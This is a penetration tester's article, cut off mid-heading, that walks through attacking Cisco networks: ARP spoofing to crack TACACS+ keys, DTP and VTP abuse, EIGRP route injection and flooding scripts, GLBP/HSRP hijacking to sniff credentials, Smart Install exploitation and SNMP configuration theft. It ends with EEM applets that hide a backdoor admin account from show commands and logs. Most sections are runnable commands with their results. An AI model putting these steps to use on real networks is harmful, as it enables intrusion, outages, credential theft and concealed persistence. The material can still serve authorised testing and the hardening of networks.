Cisco Nightmare

31 min readSep 23, 2022

Intro

Throughout my career as a network security engineer, I have seen quite a few networks using Cisco equipment. And in most cases, this equipment was running with a default configuration, which puts the local network at great risk from a potential intruder. In this article you will learn what a nightmare Cisco networks can be if they are not set up properly.

Disclaimer

This article is intended for security specialists, pentesters. The skills you learn from here are only your area of responsibility. Be careful.

The author is not responsible for any harm caused by using this information from this article.

1. Abusing TACACS+ protocol

TACACS+ (Terminal Access Controller Access Control System) is a protocol designed to centrally operate accounts that are used directly to administer network equipment. The TACACS+ server decides whether to allow or deny access to a user who attempts to log into a network equipment control panel.

If an attacker manages to get in the middle between the client and the TACACS server, he can intercept the authentication key in encrypted form and then do a local bruteforce against it. So you both bruteforce the key and you don’t show up in the logs. And if you manage to bruteforce the key, you’ll be able to access the network equipment and decrypt the traffic in Wireshark. By giving Wireshark the key, you can decrypt the rest of the data where the user’s login is stored.

1.1 MITM / Intercepting key

First you have to perform a MITM attack, it depends on the circumstances and your preferences. As an example I will do ARP spoofing against the TACACS agent and the TACACS server.

However, you won’t always be able to perform a MITM attack.
If you have some dump with TACACS+ traffic, you can repeat it on your network interface (Yes, we are talking about tcpreplay now)

The TACACS agent will be switch SW1 with the IP address 10.10.100.10
The TACACS server will be a TACACSGUI with an address of 10.10.100.70

The same ARP Spoofing I implement through the Ettercap utility. First, you need to switch the interface to promiscuous mode and allow routing:

~$ sudo ip link set eth0 promisc on
~$ sudo sysctl -w net.ipv4.ip_forward=1

Now start Ettercap.

~$ sudo ettercap -G

The listening interface will be eth0. Let’s start the host scanning.

Target 1 will be a host with an IP address of 10.10.100.10 and Target 2 will be 10.10.100.70

1.2 Loki tool.

Now you need to run Loki. This is a special tool designed to analyze the security of L2/L3 protocols. Its capabilities are just as good as those of the popular Yersinia and it is a serious competitor to it. Loki can also bruteforce TACACS keys. If the key is successfully bruteforced (usually in MD5 encrypted format), we can access the equipment and decrypt the TACACS-encrypted traffic.

Let’s start Loki.

~$ sudo loki_gtk.py

You also need to specify the path to the dictionary in order to bruteforce the encrypted key. Be sure to uncheck the Use Bruteforce option, otherwise Loki will bruteforce the password without using the dictionary.

Now we have to wait for a administrator to log into the device through the TACACS server. It is assumed that the network administrator has already logged in, and we, standing in the middle via ARP spoofing, intercept the traffic. And in doing so, the legitimate hosts don’t realize that someone else has interfered with their connection.

Now click the CRACK button and wait for Loki to break the password.

**Loki cracked the TACACS key. Password: secret1234**

Great, we managed to unlock the key, now we need to decrypt the TACACS traffic. As I said, Wireshark can handle encrypted TACACS traffic if the key is present.

We see which banner was used.

We find the username of the user admin

As a result, we have the admin:secret1234 credentials, which can be used to access the hardware itself. I think I’ll check their validity.

**Successfully gaining access to the equipment**

This is how you can attack TACACS+ and gain access to the control panel of network equipment.

2. CDP Protocol

CDP (Cisco Discovery Protocol) is a Cisco Systems development, a data link layer protocol designed to allow devices to exchange information. CDP can help the network administrator and simplify the process of trawling, but for an intruder… Let’s find out now.

2.1 Information Gathering

By default, the CDP sends announcements to all its ports. But what if an intruder connects to a port on the same switch? Using a network sniffer, be it Wireshark or tcpdump, he could extract valuable information about the device itself, from its model to the Cisco IOS version. Using this information he will be able to enumerate the same version of Cisco IOS and find the vulnerability and then exploit it.

2.2 CDP Flooding Attack

If an attacker provokes a huge number of CDP announcements, the flooding itself will overload the switch and disrupt the network. The CDP neighbor table will also overflow. This attack is simple, so I will not go into detail.

I will use Yersinia for this

~$ sudo yersinia -G

Select the flooding CDP table option and start the attack. The switch CPU will be overloaded, as well as the CDP neighbor table, resulting in “network paralysis”.

3. Abusing Dynamic Trunking

DTP (Dynamic Trunking Protocol) — is a link layer protocol designed to provide an automatic trunking system. With DTP, switches decide which port will work in trunk mode (Trunk) and which will not. In my opinion, the use of DTP indicates poor network design. Trunks should be strictly where they are needed, and it should be documented. It’s especially funny when the network engineer himself doesn’t know which port is in trunk and which is in access mode.

By default, all switch ports operate in Dynamic Auto mode. This indicates that the switch port is in trunk initiation mode from the neighboring switch. The Pentester needs to physically connect to the switch and send a DTP Desirable frame, which triggers the port to switch to trunk mode. The attacker can then enumerate VLANs using STP frame analysis and bypass VLAN segmentation by creating virtual interfaces.

For the attack we need a script that will generate the DTP Desirable frame. For this I wrote a small program called DTPHijacking.py. Its source code is open, you can study it. However, do not interrupt the script under any circumstances. It injects DTP Desirable every three seconds. The dynamically created trunk channels on the switch only live for five minutes. After five minutes, the trunk falls off.

~$ sudo python3 DTPHijacking.py --interface eth0

I would like to point out that Access/Desirable (0x03) indicates that the DTP frame is of the Desirable type, which tells the port to switch to Trunk mode. And 802.1Q/802.1Q (0xa5) indicates the 802.1Q encapsulation type.

By analyzing the STP frames, we learn about the existence of VLAN 30 and VLAN 60.

With this information and a trunk port, we can access these VLANs while bypassing VLAN segmentation. We will need to create virtual interfaces and assign an IP address to them.

in9uz@Inguz:~$ sudo vconfig add eth0 30
in9uz@Inguz:~$ sudo vconfig add eth0 60
in9uz@Inguz:~$ sudo ip link set eth0.30 up
in9uz@Inguz:~$ sudo ip link set eth0.60 up
in9uz@Inguz:~$ sudo dhclient -v eth0.30
in9uz@Inguz:~$ sudo dhclient -v eth0.60

Thus, it is possible to bypass VLAN segmentation and access VLAN networks.

4. Network Paralysis when attacking VTP protocol

VTP (VLAN Trunking Protocol) — is a protocol designed to centrally manage VLANs. To keep track of the current VLAN database, switches check special revision numbers. When any table update occurs, the revision number is incremented by one. And if a switch detects a configuration with a higher revision number, it will automatically update its VLAN database.

4.1 Roles in a VTP domain

VTP Server. A switch in the VTP Server role can create new VLANs, delete old ones, or change information in the VLANs themselves. It also generates VTP announcements for the rest of the domain members.
VTP Client. A switch in this role will receive specific VTP announcements from other switches in the domain to update the VLAN databases on its own. Clients are limited in their ability to create VLANs and are not even allowed to change the VLAN configuration locally. In other words, read only access.
VTP Transparent. In this mode, the switch does not participate in VTP processes and can host full and local administration of the entire VLAN configuration. When operating in transparent mode, switches only transmit VTP announcements from other switches without affecting their VLAN configuration. Such switches will always have a revision number of zero and cannot be attacked.

4.2 Advertisement types

Summary Advertisement — the VTP announcement that the VTP server sends every 300 seconds (5 minutes). This announcement stores the VTP domain name, protocol version, timestamp, and MD5 configuration hash value.
Subset Advertisement — this is the VTP advertisement that is sent whenever a VLAN configuration change occurs.
Advertisement Request — is a request from the VTP client to the VTP server for a Summary Advertisement message. Usually sent in response to a message that a switch has detected a Summary Advertisement with a higher configuration revision number.

VTP can only be attacked from a trunk port, because VTP announcements are only broadcast and received on trunk ports. Therefore, when pentesting after attacking DTP, your next target could be VTP. To attack the VTP domain I will use Yersinia. With it I will run a VTP inject that will erase the entire VLAN database and thus paralyze the network.

!!! The VTP protocol has as many as three versions. In this article I will perform an attack against the first version, VTPv1 !!!

To erase the entire VLAN database, select the deleting all VTP vlans option

**Network Paralysis (for host in VLAN 60)**

A host on VLAN 60 has lost connectivity to the gateway… *yikes*

5. Attacking EIGRP Protocol

EIGRP (Enhanced Interior Gateway Routing Protocol) is a dynamic routing protocol. It is a distance-vector protocol. If there is no authentication and configuration of passive interfaces, an intruder can interfere with EIGRP routing and cause routing tables poisoning. Moreover, EIGRP network (in other words, autonomous system) is flat and has no segmentation into any zones. What could this mean for an attacker? Well, if he injects a route, it is likely that this route will spread throughout the autonomous EIGRP system.

First and foremost, attacking a standalone EIGRP system requires establishing a neighborhood with a legitimate EIGRP router, which opens up a lot of possibilities, from basic reconnaissance to various injections.

For this I will use FRRouting. This is an open-source software which is designed to create a router in Unix and Linux. FRRouting allows you to implement a virtual router that supports BGP, OSPF, EIGRP, RIP and other protocols. All you need to do is deploy it on your attacker’s system and you can actually pretend to be a legitimate router in the routing domain. I’ll show you how to deploy FRR on your system in the next section.

5.1 Network Intelligence

Connecting to the routing domain allows us to do enumeration and reconnaissance of networks and not spend a lot of time scanning. This method saves you a lot of precious time. Plus, by scanning, you can get burned in front of IPS/IDS security systems. To me, connecting to the domain and enumeration is the attack vector on routing domains that gives you the most impact. But to do this you need to deploy FRRouting. Here we go.

It is necessary to edit the configuration file daemons. It contains the configurations of the daemons in the context of their activity. Either they are enabled (yes) or not (no). We need to activate the eigrpd daemon.

~# nano /etc/frr/daemons
eigrpd=yes

After that, you need to correct the vtysh.conf file by adding a line responsible for saving the configuration to one file, so that configurations of different protocols are not scattered into different files (e.g. eigrpd.conf, staticd.conf). It is configurable optionally.

~# nano /etc/frr/vtysh.conf
service integrated-vtysh-config

The FRRouting configuration is done. Now it’s time to run the FRR daemon. And yes, we need to enable traffic routing. By default it is disabled in Linux distributions

~$ sudo systemctl start frr
~$ sudo sysctl -w net.ipv4.ip_forward=1

The vtysh command will take us to the FRR router control panel.

~$ sudo vtysh

Example:

Inguz# show version

However, before configuring EIGRP on the FRR router, you need to know the autonomous system number and understand if there is authentication.

However, don’t forget that the EIGRP routing domain can be protected by authentication. But you still have a chance to connect to the routing domain. When hello packets are sent out, they also contain cryptographic hashes. If you can extract these hashes from the traffic dump and reset the password, you can log on to the routing domain with this password.

Go to global configuration mode and start the EIGRP process, specify the autonomous system number — 1

And we also need to declare the network we are in. We are at 10.10.100.0/24. My address is 10.10.100.50/32

Inguz# config
Inguz(config)# router eigrp 1
Inguz(config-router) network 10.10.100.50/32

After that, the neighborhood between the legitimate EIGRP routers is established. There are two of them on my network:

GW1 (10.10.100.100)
GW2 (10.10.100.200)

**EIGRP Neighborship with GW1 (10.10.100.100)**

**EIGRP Neighborship with GW2 (10.10.100.200)**

During the establishment and maintenance of the neighborhood between EIGRP routers, routers exchange their routing information. After the neighborhood is established, new routes will appear in our routing table of the attacking system, namely:

10.1.239.0/24 via 10.10.100.100;
30.30.30.0/24 via 10.10.100.100;
100.100.100.0/24 via 10.10.100.100;
172.16.100.0/24 via 10.10.100.200

Thus, after establishing the neighborhood, we know about the existence of these subnets, which makes it easier for us to pentest and save time. We can do without additional subnet scanning. Now we are in the EIGRP routing domain and we can develop some attack vectors. Let’s talk about them.

5.2 Fake EIGRP Neighbors

I have found that generating and quickly sending out mass EIGRP hello packets overloads the router’s CPU, which in turn can open the door to a DoS attack. I have developed a little helloflooding.py script, but it seems to me that the script lacks the speed of sending out the packets. It’s caused by GIL, which prevents the sprayhello function from running in multiple threads per second. Eventually I’ll rewrite the script in C.

Arguments of the script:

Interface of the attacking system (eth0);
EIGRP autonomous system number (1);
Subnet where the attacking system is located. In my case, the subnet is 10.10.100.0/24

~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24

5.3 EIGRP Blackhole

The essence of this attack is a simple injection of a false route that will poison the routing table. Traffic to, say, the 10.10.100.0/24 network will go nowhere, causing a denial of service. Such an attack is called a Blackhole. The script routeinject.py will be the tool used to perform it. For this example, I will send traffic destined for host 172.16.100.140/32 to the black hole.

Arguments of the script:

interface of the attacking system
EIGRP AS number
IP address of the attacker
IP address of the target subnet whose traffic will be sent to the black hole
target subnet mask

~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32

Our host seems to be in trouble :)

As you can see, the host loses connectivity to host 172.16.100.140/32 due to route injection.

**Malicious route in the routing table**

5.4 Abusing K-Values

To establish EIGRP neighbors, routers use special K-values. They must be the same among all EIGRP neighbors. If at least one K-value does not match, the EIGRP domain will crash and the neighborhood will be broken. We will use relationshipnightmare.py to perform this attack

Script arguments:

network interface
EIGRP AS number
IP Address of legitimate router

On behalf of the specified IP and will be sent an inject on the multicast EIGRP IP address, in which the K-values are different. In my case, I will break the neighborhood on behalf of router GW1 (address is 10.10.100.100).

~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100

**Dump of traffic during a neighborhood disruption**

**GW1 router endlessly disconnects and reconnects EIGRP**

A DoS attack can be carried out in this way. During operation, endless breakups and neighborhood attempts occur, paralyzing part of the EIGRP routing domain.

5.5 Routing table overflow

The essence of this attack is to provoke the sending of a huge number of false routes, which will overflow the routing table. This depletes the computing resources of the router, namely the CPU and RAM, since the injections occur at enormous speed. This attack is implemented routingtableoverflow.py script

Script arguments

network interface
EIGRP AS Number
Attacker’s IP address

in9uz@Inguz:~$ sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50

After running the script, the routing table starts overflowing with routes. The random addresses of the target networks are due to the use of RandIP() in Scapy.

**Routing table overflows on GW1 router**

6. FHRP Hijacking

6.1 What is FHRP?

FHRP (First Hop Redundancy Protocol) is a class of network protocols designed to create a hot redundant routing system. With FHRP, physical routers can be combined into a single logical device, which increases fault tolerance and helps distribute the load.

Cisco Systems engineers have developed two FHRP protocols, GLBP and HSRP, which I will demonstrate next.

6.2 GLBP Protocol

Developed by Cisco Systems engineers. Like HSRP, this protocol is implemented on top of TCP/IP protocol stack, that’s why UDP transport layer protocol under port number 3222 is used for translation of service information. GLBP routers within the same logical group exchange special “hello” packets every 3 seconds, but if within 10 seconds a GLBP router within the same group has not received a hello packet from its GLBP neighbor, it recognizes it as “dead”. However, the timer values can be configured depending on the administrator’s needs.

6.3 The skeleton and mechanics of GLBP

GLBP provides load sharing to multiple routers (gateways) using one virtual IP address and multiple virtual MAC addresses. Each host is configured with the same virtual IP address and all routers in the virtual group participate in packet transmission.

Works much differently with the HSRP and VRRP protocols because it uses true load balancing mechanisms, I will denote below:

Host-Dependent. A type of load balancing used on a network where there is NAT. Host-Dependent guarantees the fact that the host will get back the same MAC address of the AVF device which was used at an earlier point in time, thus the NAT configured to the host will not be broken.

Round-Robin. In this mode, the AVG device distributes MAC addresses to AVF members alternately. This is the mechanism used by default.

Weight-based round-robin. Load balancing based on a special “Weight” metric

6.4 Roles in the GLBP domain & Terminology

AVG (Active Virtual Gateway) — the router with the leading role is also responsible for distributing MAC addresses to other routers within the same GLBP group. A kind of “boss” in the GLBP domain. AVG tells the other routers how to distribute traffic by handing out MAC addresses when an ARP request arrives. It is worth noting that there can only be one AVG router in a GLBP domain, but it can also be an AVF member.

AVF (Active Virtual Forwarder) — a router in a GLBP group handling traffic in the network.

GLBP Priority — The priority value that determines which router in the GLBP group will be the AVG. The default value is 100 (the priority range can be from 1 to 255). It can be set manually, i.e. the network engineer himself determines which router will be the “superior” and which will be the “slave”. The higher the priority, the more likely the router will get the AVG role. Usually the AVG role is given to more powerful routers.

GLBP Weight — The value of the so-called GLBP Weight of a router in a GLBP group. GLBP Weight defines the load level of the router. This value is “floating” and can vary depending on the load on the physical channel (the Object Tracking mechanism is involved), but it can also be configured manually.

GLBP Virtual IP Address — the virtual IP address in the GLBP domain. Used as the default gateway address for legitimate hosts.

GLBP uses the reserved group mailing IP address 224.0.0.102 and the UDP transport layer protocol port number 3222 to send and process service information. Special GLBP Hello packets are sent every 3 seconds. If the GLBP router has not received a hello packet from a neighbor within 10 seconds, the neighbor will be considered “dead” and will drop out of the GLBP domain.

6.5 GLBP Attack Mechanism

The technique of this network attack is to impose your device as the main router by injecting a malicious GLBP packet with a maximum priority value. Successful exploitation leads to a DoS or MITM attack in which you can intercept traffic within the network, conduct a redirect, or cause a DoS as you take over the role of AVG router. All you have to do is build a GLBP packet with the highest priority value of 255 and direct it towards the local network.

6.6 GLBP Injection (Loki)

To demonstrate this attack, I will use Loki. It will perform a malicious GLBP injection with a maximum priority value of 255 and a maximum weight value of 255. But before performing the attack, the following information needs to be examined:

The virtual IP address used in the GLBP domain
availability of authentication
Value of router priorities

We will be able to extract this information by analyzing GLBP traffic. We will use Wireshark.

As we see, only two routers are involved in the GLBP process: 10.10.100.100 and 10.10.100.200.

**GLBP Advertisement from first router**

**GLBP Advertisement from second router**

After analyzing GLBP traffic we have the following:

A misconfiguration was detected within the priority setting. AVG router is considered a GLBP router with priority 200, i.e. we have a vector for GLBP hijacking
no authentication
The virtual IP address used in the GLBP domain is 10.10.100.254

With this information, we can easily attack GLBP.

**Loki found GLBP ads from two routers**

Before the attack, switch to promiscious mode and allow traffic routing:

~$ sudo ip link set eth0 promisc on
~$ sudo sysctl -w net.ipv4.ip_forward=1

Select the router at IP address 10.10.100.100 and activate the Get IP option. You also need to generate a Gratuitous ARP.

**The structure of a malicious GLBP injection**

As you can see, the AVG router is now pretending to be an attacking system. The priority value is 255, the weight value is 255, i.e. the maximum.

After performing the injection we need to create a secondary IP address on our network interface with the value of the virtual IP address in the GLBP domain. You also need to set a 24-bit mask.

This way legitimate traffic will be looped back to us, because the virtual IP address used in the GLBP domain is the default gateway address for hosts:

~$ sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0

To see not only incoming traffic but also outgoing traffic, we need a small rule for SNAT (masquerading):

~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

We also need to remove the default route on our machine and write a new one which will go through the former AVG router (address is 10.10.100.100). Even though we have hijacked the AVG role from the router, it will still be able to route traffic.

~$ sudo route del default
~$ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100

That’s it, we are now the “man in the middle”! I will run the tool net-creds.py to analyze the traffic to look for important data. For example, unencrypted FTP traffic or NTLM hashes.

~$ sudo python2 net-creds.py -i eth0

After running the utility, I will try to read the SMB share with the IP address 172.16.100.70, which is behind the GLBP routers.

user@Boundless:~$ smbclient -L \\172.16.100.70 --user mercy

This is how you can intercept traffic within the network by attacking GLBP domains.

6.7 HSRP Hijacking

HSRP (Hot Standby Router/Redundancy Protocol) — is a Cisco proprietary protocol that allows for network gateway redundancy. The general idea is to combine several physical routers into one logical router with a common IP address. This address of the virtual router will be assigned to the interface of the router with the master role, and the latter, in its turn, will take care of traffic forwarding. In the HSRP domain, the task of handling all traffic falls precisely on the router with the primary role, unlike GLBP, where load balancing by using special metrics (priority and weight) was proposed.

6.8 Roles in the HSRP domain & terminology

HSRP Active Router — a device that acts as a virtual router and provides forwarding of traffic from source networks to destination networks.
HSRP Standby Router — a device that acts as a standby router, waiting for the active router to fail. When the primary Active router fails, the Standby router will take over the primary role and take over the duties of the Active router.
HSRP Group — a group of devices that ensures the operation and fault tolerance of a logical router.
HSRP MAC Address — the virtual MAC address of the logical router in the HSRP domain.
HSRP Virtual IP Address — This is a special virtual IP address in the HSRP group. This IP address will be the default gateway for the end hosts, used on the logical router itself.

6.9 HSRP protocol versions

The HSRP protocol has two versions — HSRPv1 and HSRPv2. They differ in the following parameters:

The number of possible logical groups. HSRPv1 can have up to 255 groups. HSRPv2 can have up to 4096 groups
Multicast IP address. HSRPv1 uses IP address 224.0.0.2 to send service information, and HSRPv2 uses 224.0.0.102
Virtual MAC address. HSRPv1 uses 00:00:0C:07:AC:XX as its virtual MAC address. HSRPv2 has a virtual MAC address of 00:00:0C:9F:FX:XX (where XX is the HSRP group number)

HSRP uses the reserved IP address 224.0.0.2 or 224.0.0.102 (depending on the HSRP version) and the UDP transport layer protocol with port number 1985 to broadcast and process the service information. Special HSRP Hello packets are sent every 3 seconds. If the HSRP router does not receive a hello packet from a neighbor within 10 seconds, the neighbor will be considered “dead” and will drop out of the HSRP domain.

6.10 HSRP Attack Mechanism

This is exactly the same as GLBP Hijacking. We need to perform a malicious HSRP injection with a maximum priority value of 255. This allows us to hijack the role of the Active router, opening the door to a MITM attack. But again, we need to examine the following information before conducting the attack:

The virtual IP address used in the HSRP domain
The presence of authentication
Value of router priorities

We can extract this information by analyzing HSRP traffic. Let’s use Wireshark.

As you can see in the screenshot, the HSRP process involves only two routers with addresses 10.10.100.100 and 10.10.100.200

Based on the analysis of HSRP traffic, we have the following:

A misconfiguration was detected within the priority setting. Active router is considered to be a HSRP router with priority 200, that is, we have a vector for HSRP hijacking
the virtual IP address used in the HSRP domain is 10.10.100.254
MD5 authentication is used

Having authentication in the domain ties our hands, but I will fix that.

6.11 HSRP Authentication Bypassing

Save HSRP traffic dump in .pcap format, so that the exfiltrator can correctly extract MD5 hashes from the dump. I will use hsrp2john.py as the exfiltrator:

~/cisconightmare/exfiltrate$ python2 hsrp2john.py hsrp_with_authentication.pcap

**Extracted MD5 hashes from HSRP traffic dump**

I will crack the hashes with John the Ripper, specify the hashes themselves as input. And with the — wordlist switch I will specify the path to the dictionary:

~/cisconightmare/exfiltrate$ john hsrp_hashes --wordlist=wordlistforbrute

As a result, we have a key to enter the HSRP domain — endgame.

6.12 HSRP Injection (Loki)

I will use the same Loki to attack the HSRP protocol. Among other things, it has a key injection feature, which helps us bypass authentication. Earlier, in the HSRP Hijacking section, we obtained all the necessary information about the HSRP domain.

Starting Loki.

Don’t forget to switch to promiscuous mode and allow traffic routing before conducting the attack:

~$ sudo ip link set eth0 promisc on
~$ sudo sysctl -w net.ipv4.ip_forward=1

Select the router with an address of 10.10.100.100 and a priority of 200. As the Secret parameter, enter the cracked password from the HSRP domain, generate a Gratuitous ARP and select the Get IP option.

**The structure of a malicious HSRP injection**

As we can see, the Active router is now our attacking system. The priority value is 255.

After injection we need to create a secondary IP address on our network interface with the value of the virtual IP address in the HSRP domain. You should also specify 24-bit mask. In this way, legitimate traffic will be looped back to us, because the virtual IP address used in the HSRP domain is the default gateway address for hosts.

~$ sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0

We set up the well-known Source NAT (masquerading) to intercept all traffic:

~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

We remove the default route on our machine and write a new one which will go through the former Active router (its address is 10.10.100.100). Even though we have hijacked the active role from the router, it will still be able to route traffic.

~$ sudo route del default
~$ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100

Now we are the “man in the middle”. Let’s run net-creds.py:

~$ sudo python2 net-creds.py -i eth0

After running the utility, I will reproduce an attempt to authenticate to the FTP server at 172.16.100.140:

~$ ftp 172.16.100.140

**Intercepted FTP-creds (insomnia:betrayal)**

As a result, we get creeds from the FTP server: insomnia:betrayal

This is how you can attack the HSRP domain and intercept traffic. Basically, everything is similar to GLBP.

7. Cisco Smart Install Exploitation

Cisco Smart Install — is a Cisco designed to automate the initial configuration and loading of an operating system image for new Cisco hardware. By default, Cisco Smart Install is active on Cisco hardware and uses the transport layer protocol, TCP, with port number 4786.

In 2018, a critical vulnerability, CVE-2018–0171, was found in this protocol. The threat level is 9.8 on the CVSS scale.

A specially crafted packet sent to the TCP/4786 port, where Cisco Smart Install is active, triggers a buffer overflow, allowing an attacker to:

forcibly reboot the device
call RCE
steal configurations of network equipment.

The SIET (Smart Install Exploitation Tool) was developed to exploit this vulnerability, it allows you to abuse Cisco Smart Install. In this article I will show you how you can read a legitimate network hardware configuration file. Configure exfiltration can be valuable for a pentester because it will learn about the unique features of the network. And this will make life easier and allow finding new vectors for an attack.

The target device will be a “live” Cisco Catalyst 2960 switch. Virtual images do not have Cisco Smart Install, so you can only practice on the real hardware.

The address of the target switch is 10.10.100.10 and CSI is active. Load SIET and start the attack. The -g argument means exfiltration of the configuration from the device, the -i argument allows you to set the IP address of the vulnerable target.

~/opt/tools/SIET$ sudo python2 siet.py -g -i 10.10.100.10

**Successful exploitation of a vulnerability**

The switch configuration 10.10.100.10 will be in the tftp/ folder

8. Configuration exfiltration and enumeration via SNMP

SNMP (Simple Network Management Protocol) — is a protocol that allows you to monitor the status of devices on a computer network. It can be network equipment, IP phones, corporate servers or anything else.

SNMP uses the UDP transport layer protocol with port numbers 161/UDP and 162/UDP. So-called community strings are used to refer SNMP agents to the server. These are, shall we say, special passwords for communicating with the SNMP server. Community strings have either RO (read-only) or RW (read-write) permissions.

Actually, SNMP can not only monitor the equipment status, but also manage it in full: dump configs, change the configuration, etc. If a pentester can look up the value of community strings, he actually gains access to the equipment. However, it all depends on which string he bruteforced— to RO or RW community string.

Bruteforce community strings can be implemented using the onesixtyone utility. It will take as input the dictionary for bruteforcing and the IP addresses of the target hosts. The targets will be:

10.10.100.10 — Cisco vIOS Switch
10.10.100.254 — Cisco vIOS Router

~$ onesixtyone -c communitystrings -i targets

We found out what community strings are used on those devices. This opens the way for us to exploititation.

8.1 cisco_config_tftp

With the Metasploit framework, namely the cisco_config_tftp module, you can pull the device configuration by knowing the value of the community string. The string that has the rights to the RW is private.

We will need the following:

RW community string (COMMUNITY)
Attacker’s IP address (LHOST)
Target equipment IP address (RHOSTS)
the path in which the module outputs the configuration of the device (OUTPUTDIR)

msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set COMMUNITY privatemsf6 auxiliary(scanner/snmp/cisco_config_tftp) > set RHOSTS 10.10.100.10msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set LHOST 10.10.100.50msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set OUTPUTDIR /home/necreas1ng/snmpmsf6 auxiliary(scanner/snmp/cisco_config_tftp) > exploit

After starting the module, the host configuration with address 10.10.100.10 (10.10.100.10.txt) will be downloaded to the specified folder.

**Part of the contents of the SW1 equipment configuration**

8.2 snmp_enum

With this module you can find out information about the target hardware. Everything is exactly the same: specify COMMUNITY (by the way, even a string with RO permissions will do) and the IP address of the target device.

msf6 auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY publicmsf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.100.10msf6 auxiliary(scanner/snmp/snmp_enum) > exploit

**Information about the device received via SNMP**

9. Post-exploitation of hacked Cisco equipment

9.1 Bruteforce hashes

When you list the device configuration, it makes sense to try to brute-force the password hashes. Maybe you can brute-force the password hash of the account that has the highest privileges. There are several types of passwords in Cisco IOS which are stored in an encrypted form. The table below will guide you through the hash types, how to brute-force and how long it will take.

Now let’s proceed to the bruteforce itself. In the output of the show run command you will probably come across these lines.

**Accounts and their passwords in encrypted form**

I will bruteforce the hashes with the John the Ripper utility. I will format the hashes a bit, so that “John” will be able to recognize the hashes themselves inside the file, which we will feed as input.

Let’s start the bruteforce. Use the — wordlist switch to specify the path to the dictionary. “John” will determine the type of hashes inside the file.

~$ john hashes --wordlist=wordlistforbrute

Creds: anxious:Secret123 lies:P@ssw0rd

Let’s try to access the router 10.10.10.100 as user lies.

9.2 Cisco EEM

Cisco EEM is, shall we say, a “programming language” that can be used to write scripts for Cisco IOS and automate routine tasks. In pentest Cisco EEM will help us to hide the user we created on a hacked device.

But! This method also has its disadvantages:

there is a small chance of getting caught in the SYSLOG or SNMP server logs
if the network engineer also uses Cisco EEM, he may suspect something wrong

First we need to create the user himself, which will be used to attach to the hardware. Make sure that the nickname also has the prefixhidden_. With this prefix we will hide the user we created with the mask| hidden:

Owned(config)# username hidden_grimoire privilege 15 secret youcantseewhatyouwannasee

9.2.1 Hiding from the output of the show run command

This command is very often used by network engineers, it outputs the configuration of the device which is currently in use.

Owned(config)# event manager applet hide_from_showrunOwned(config-applet)# event cli pattern "show run" sync yesOwned(config-applet)# action 0.0 cli command "enable"Owned(config-applet)# action 1.0 cli command "show run | exclude hidden | event | action"Owned(config-applet)# action 2.0 puts "$_cli_result_showrunapplet"

9.2.2 Hiding from the output of the show ssh command

This command displays the currently active users connected via SSH

Owned(config)# event manager applet hide_from_showsshOwned(config-applet)# event cli pattern "show ssh" sync yesOwned(config-applet)# action 0.0 cli command "enable"Owned(config-applet)# action 1.0 cli command "show ssh | exclude hidden"Owned(config-applet)# action 2.0 puts "$_cli_result_showsshapplet"

9.2.3 Hiding from the output of the show users command

Displays the currently active users connected via VTY. These are usually remote Telnet and SSH sessions.

Owned(config)# event manager applet hide_from_showusersOwned(config-applet)# event cli pattern "show users" sync yesOwned(config-applet)# action 0.0 cli command "enable"Owned(config-applet)# action 1.0 cli command "show users | exclude hidden"Owned(config-applet)# action 2.0 puts "$_cli_result_showusersapplet"

9.2.4 Hiding from the output of the show log command (local Cisco IOS logging)

Owned(config)# event manager applet hide_from_showlogOwned(config-applet)# event cli pattern "show log" sync yesOwned(config-applet)# action 0.0 cli command "enable"Owned(config-applet)# action 1.0 cli command "show log | exclude HA_EM | hidden"Owned(config-applet)# action 2.0 puts "$_cli_result_showlogapplet"

The EEM applets have a lot of interesting features, I advise you not to limit yourself to these ways.

9.3 Lateral VLAN Segmentation Bypass

If you have access to a switch that you are directly connected to, you have the ability to bypass VLAN segmentation within the network. Simply switch the port to trunk mode (otherwise known as trunk), create virtual interfaces with the IDs of the target VLANs, and configure an IP address. You can try requesting the address dynamically (DHCP) or you can configure it statically. It depends on the case.

First you need to find out exactly which port you are connected to. This is done via CDP messages, or you can search the port by mask include.

**The CDP announcement from the switch. We are on GigabitEthernet0/2 port**

If the CDP is suddenly disabled, you can try searching the port by our MAC address.

SW1(config)# show mac address-table | include 0050.0000.0500

Before we switch to trunk mode, we need to list the existing VLANs and find out their identifiers. Then we will hang these identifiers on our interface to access VLANs. Thus, thanks to the trunk we can access any VLAN. By the way, the port we are connected to belongs to VLAN 10.

SW1# show vlan brief

**show vlan brief (VLAN 10, 20, 50, 60)**

Here we go. Enter interface configuration mode and go into trunk mode.

SW1(config)# interface GigabitEthernet 0/2SW1(config-if)# switchport trunk encapsulation dot1qSW1(config-if)# switchport mode trunk

During the switch to trunk mode, connectivity is lost. But I will fix that.

**Loss of connectivity at the moment of port mode switching**

Create virtual interfaces and “hang” VLAN ID on them, and then raise them.

~$ sudo vconfig add eth0 10~$ sudo vconfig add eth0 20~$ sudo vconfig add eth0 50~$ sudo vconfig add eth0 60~$ sudo ifconfig eth0.10 up~$ sudo ifconfig eth0.20 up~$ sudo ifconfig eth0.50 up~$ sudo ifconfig eth0.60 up

Now you need to request an address via DHCP. But if in your case this is not possible, you can set the address statically.

~$ sudo dhclient -v eth0.10~$ sudo dhclient -v eth0.20~$ sudo dhclient -v eth0.50~$ sudo dhclient -v eth0.60

Example of configuring a static IP address on an interface (VLAN 10):

~$ sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0

To test the connection, I initiate ICMP requests to the default gateways for VLANs 10, 20, 50, 60

In the end, I bypassed VLAN segmentation and can get into any VLAN network, which unties my hands for the next steps.

9.4 Configuration Enumeration

